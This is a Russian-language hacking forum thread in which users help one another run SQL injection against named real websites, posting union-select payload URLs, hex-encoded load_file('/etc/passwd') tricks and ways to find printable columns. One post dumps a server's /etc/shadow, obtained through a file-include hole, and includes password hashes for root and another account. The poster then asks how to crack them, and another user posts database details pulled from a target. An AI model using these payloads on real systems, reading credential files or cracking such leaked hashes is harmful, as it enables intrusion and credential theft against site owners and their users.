Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    1. http://hack-shop.org.ru/tools-code-encode
    >SQL Hex + 0x | Path :

    2. правильно load_file('/etc/passwd')
     
    2 people like this.
  2. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    sakh_rider
    load_file('/etc/passwd') == load_file(0x272f6574632f70617373776427)
     
  3. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    вообще то в хексе без ковычек)
     
  4. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    чо делать вот с этим http://www.uniway.be/reference.aspx?id=221'
     
    1 person likes this.
  5. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    тут ничего нет, оно просто ругается на некорректный формат полученных данных
     
    #2325 l-l00K, 14 Jun 2008
    Last edited: 14 Jun 2008
    2 people like this.
  6. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    чот не могу подобрать кол-во столбцов уже дошел до 30
    а при order by все время ошибка
    Ошибка запроса:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1/*' at line 1
    объясните что делаю не так???
    http://www.kn.kz/articles.php?id=-274+union+select+order+by+1/*
     
  7. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    ну подскажите(
    c order by разобрался он мне говорит что там 3 столбца но при union select 1,2,3/*
    выдает ошибку
    Ошибка запроса:The used SELECT statements have a different number of columns
    http://www.kn.kz/articles.php?id=-1+union+select+1,2,3/*
     
    #2327 Vid0k, 14 Jun 2008
    Last edited: 14 Jun 2008
  8. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Там к двум таблицам запрос, с разным числом колонок.
     
  9. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    и что мне делать можно эту скулю расскрутить и как?
     
    1 person likes this.
  10. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    В этой может подзапросы прокатят. Попробуй другие бажные скрипты поискать. На крайний случай, в сканер загани.

    Вот посмотри, может выйдет что.
    HTML:
    http://www.kn.kz/not_live_build.php?action=search&cityId=-2+union+select+0/*
    
     
    #2330 .Begemot., 14 Jun 2008
    Last edited: 15 Jun 2008
    1 person likes this.
  11. Vid0k

    Vid0k Elder - Старейшина

    Joined:
    24 Dec 2007
    Messages:
    393
    Likes Received:
    125
    Reputations:
    13
    у мя тут еще вопросик
    нашел инклуд удалось прочитать etc/shadow
    root:$1$8rIgCgQb$aAplIifRAaGkohCa4G1/8/:13773:0:99999:7:::
    bin:*:13742:0:99999:7:::
    daemon:*:13742:0:99999:7:::
    adm:*:13742:0:99999:7:::
    lp:*:13742:0:99999:7:::
    sync:*:13742:0:99999:7:::
    shutdown:*:13742:0:99999:7:::
    halt:*:13742:0:99999:7:::
    mail:*:13742:0:99999:7:::
    news:*:13742:0:99999:7:::
    uucp:*:13742:0:99999:7:::
    operator:*:13742:0:99999:7:::
    games:*:13742:0:99999:7:::
    gopher:*:13742:0:99999:7:::
    ftp:*:13742:0:99999:7:::
    nobody:*:13742:0:99999:7:::
    dbus:!!:13742:0:99999:7:::
    vcsa:!!:13742:0:99999:7:::
    rpm:!!:13742:0:99999:7:::
    haldaemon:!!:13742:0:99999:7:::
    netdump:!!:13742:0:99999:7:::
    nscd:!!:13742:0:99999:7:::
    sshd:!!:13742:0:99999:7:::
    rpc:!!:13742:0:99999:7:::
    rpcuser:!!:13742:0:99999:7:::
    nfsnobody:!!:13742:0:99999:7:::
    mailnull:!!:13742:0:99999:7:::
    smmsp:!!:13742:0:99999:7:::
    pcap:!!:13742:0:99999:7:::
    apache:!!:13742:0:99999:7:::
    webalizer:!!:13742:0:99999:7:::
    xfs:!!:13742:0:99999:7:::
    ntp:!!:13742:0:99999:7:::
    pegasus:!!:13742:0:99999:7:::
    named:!!:13742:0:99999:7:::
    ftpuser:$1$PF7fe8Eh$rITd0IUQ1KF809DLIfH6H/:13742:0:99999:7:::
    xat:!!:13745:0:99999:7:::
    mysql:!!:13754::::::
    посоветуйте прогу для расшифровки как я понимаю тут md5
    потому что стоит префикс $1$?
     
  12. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    Зайди на Old.Antichat.Ru , там есть описание хешей или по форуму поищи.
     
  13. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    md5(unix) , PP
     
  14. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Vid0k
    Данные выводятся в Назв. Комплекса\

    Database Version: 4.1.20
    Database name: knkz
    User name: [email protected]
     
    #2334 sabe, 15 Jun 2008
    Last edited: 15 Jun 2008
  15. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    появился вопрос...
    вот есть инжект...
    Code:
    http://www.beka.ru/php/content.php?id=1614+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
    ошибка на том сайте не выводится, а просто перебрасывает на главную страницу сайта.. собственно вопрос.. как определить принтабельные поля?
     
  16. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    19 штук.. перебрать влом?)) юзай тулзы..
     
    #2336 sabe, 15 Jun 2008
    Last edited: 15 Jun 2008
  17. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    не понял... всмысле перебрать?
    а тулзы юзать пока не получится.. линуху поставил, а линуховские тулзы не видел...
    просто такой движок я уже нашел примерно на 20 сайтах... именно тф же переменная уязвима и именно так же перебрасывает..
     
    #2337 gisTy, 15 Jun 2008
    Last edited: 15 Jun 2008
  18. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    как я понял тебе нужно найти поле куда вписать значение?
    ну вот вписуй например version() в каждое поле с 1 по 19 пока чтото не выдаст...?
     
  19. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    ничего это бы и не дало, но я все таки решил попробовать... может еще какие-нибудь мысли будут?
     
  20. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    я канешн с такой траблой не сталкивался.. но почему нет? теоритически должно выйти.. токо с конвертированиям заипешся... unhex(hex(version())), больше идей нету..)
     
    #2340 sabe, 15 Jun 2008
    Last edited: 15 Jun 2008
Thread Status:
Not open for further replies.